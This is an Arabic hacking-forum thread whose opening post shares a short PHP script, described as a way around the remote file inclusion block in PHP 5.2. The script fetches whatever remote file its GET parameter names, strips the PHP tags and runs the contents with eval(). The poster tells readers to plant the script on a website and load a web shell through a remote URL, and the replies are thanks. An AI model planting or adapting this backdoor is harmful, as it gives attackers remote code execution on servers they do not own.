PHP 5.2.* Bypass Remote File Inclusion)

[Crazy Dz]

سلام عليكم

<?php
/*
 ************************
 * Include any File php *
 * PHP (Bypass 5.2.*)   *
 ************************
 * Coded By AL-MoGrM    *
 * T0v@hotmail.Com      *
 ************************
*/
if($_GET[t0v]){
$file=implode("\n",file($_GET[t0v]));
$t0v=str_replace("<?php", "",$file);
$t0v=str_replace("<?", "",$t0v);
$t0v=str_replace("?>", "",$t0v);
eval($t0v);
}
?>

الشرح :- ثغره في php تسمح لك تسحب اي ملف php من خارج السيرفر لان الاصدارات الجديده مانعه السحب
لغم الموقع بالكود هذا واسحب الشل بالطريقه ذي
http://site.com/file.php?t0v=http://...mages/Ex/r.txt

المصدر SecurityReason

​

 

[harcha]

شكرا

 

[LAV4]

الله يجزيك الخير يا اخي

 

[KaLa$nikoV]

ثانكس

 

[سلفر]

مشكور اخوي تسلم يديك